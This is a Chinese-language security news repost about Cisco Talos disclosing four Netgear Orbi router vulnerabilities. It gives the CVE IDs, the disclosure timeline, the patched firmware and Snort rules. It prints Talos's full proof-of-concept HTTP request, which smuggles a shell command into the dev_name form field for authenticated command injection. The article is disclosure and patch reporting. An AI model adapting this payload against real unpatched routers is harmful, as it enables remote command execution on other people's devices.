专家发布了针对Netgear Orbi路由器严重缺陷漏洞的PoC

Cisco Talos研究人员针对Netgear Orbi 750系列路由器和扩展系列中漏洞POC。

Netgear Orbi是一系列网状Wi-Fi系统,旨在为整个家庭或企业提供高速、可靠的Wi-Fi覆盖。Orbi系统由一个主路由器和一个或多个卫星单元组成,它们协同工作以创建一个无缝的 Wi-Fi 网络,该网络可以通过一致的高速 Wi-Fi 覆盖大面积区域。

Orbi系统的主要优势之一是其使用网状网络技术,该技术允许卫星单元与主路由器通信并相互通信,以在整个家庭或企业提供强大的Wi-Fi覆盖。

思科与Netgeat合作解决了这些问题,并根据 思科漏洞披露政策中概述的90天时间表披露了这些问题。

Cisco Talos研究人员针对Netgear的Orbi 750系列路由器和扩展卫星中的多个漏洞发布了概念验证(PoC)漏洞。

专家们在Netgear Orbi mesh无线系统中发现了四个漏洞,其中最关键的一个是严重的远程代码漏洞,追踪为CVE-2022-37337(CVSS v3.1: 9.1),存在于Netgear的访问控制功能中奥秘路由器。

“Netgear Orbi Router RBR750 4.6.8.5的访问控制功能中存在命令执行漏洞。”“攻击者可以发出经过身份验证的 HTTP 请求来触发此漏洞。”

威胁行为者可以通过发送特制的HTTP请求来利用该漏洞。

“Talos在Orbi Satellite中发现了一个漏洞——TALOS-2022-1596(CVE-2022-37337)——可能导致在设备上执行任意命令。用户需要先通过网状系统的身份验证,这意味着他们需要访问未受保护的网络或受密码保护的网络的登录凭据,才能使这种攻击成功。然后,对手需要发送特制的HTTP请求来触发漏洞。”

思科发布了针对此问题的概念验证:

POST /access_control_add.cgi?id=e7bbf8edbf4393c063a616d78bd04dfac332ca652029be9095c4b5b77f6203c1 HTTP/1.1
Host: 10.0.0.1
Content-Length: 104
Authorization: Basic YWRtaW46UGFzc3cwcmQ=
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.61 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: yummy_magical_cookie=/; XSRF_TOKEN=2516336866
Connection: close

action=Apply&mac_addr=aabbccddeeaa&dev_name=test;ping${IFS}10.0.0.4&access_control_add_type=blocked_list

以下是Cisco Talos的Dave McDaniel报告的此问题的时间表:

2022-08-30 – 初始供应商联系
2022-09-05 – 供应商披露
2023-01-19 – 供应商补丁发布
2023-03-21 – 公开发布

研究人员发现的另外两个问题分别被跟踪为TALOS-2022-1595(CVE-2022-38452)和TALOS-2022-1597(CVE-2022-36429)。这些缺陷会影响主要的Orbi路由器,如果攻击者分别发送特制的网络请求或 JSON 对象,它们的利用可能导致任意命令执行。

Talos 发现的最后一个漏洞被跟踪为TALOS-2022-1598  (CVE-2022-38458),攻击者可以利用这些漏洞进行中间人攻击来诱骗服务的 Web 服务管理工具泄露敏感信息。

Netgear于2023年1月19日发布固件版本4.6.14.3解决了这些缺陷。

安全公司并不知道利用这些漏洞的野外攻击。

“鼓励用户尽快更新这些受影响的产品:Netgear Orbi Satellite RBS750,版本4.6.8.5。Talos测试并确认这些版本的 Orbi系统可以被这些漏洞利用。”

该公司还发布了Snort规则(60474–60477和60499)来检测针对此漏洞的利用企图。

本文来源于Lonely Blog -全球网络安全资讯平台, 转载请注明出处: https://blog.wuhao13.xin/5276.html

标签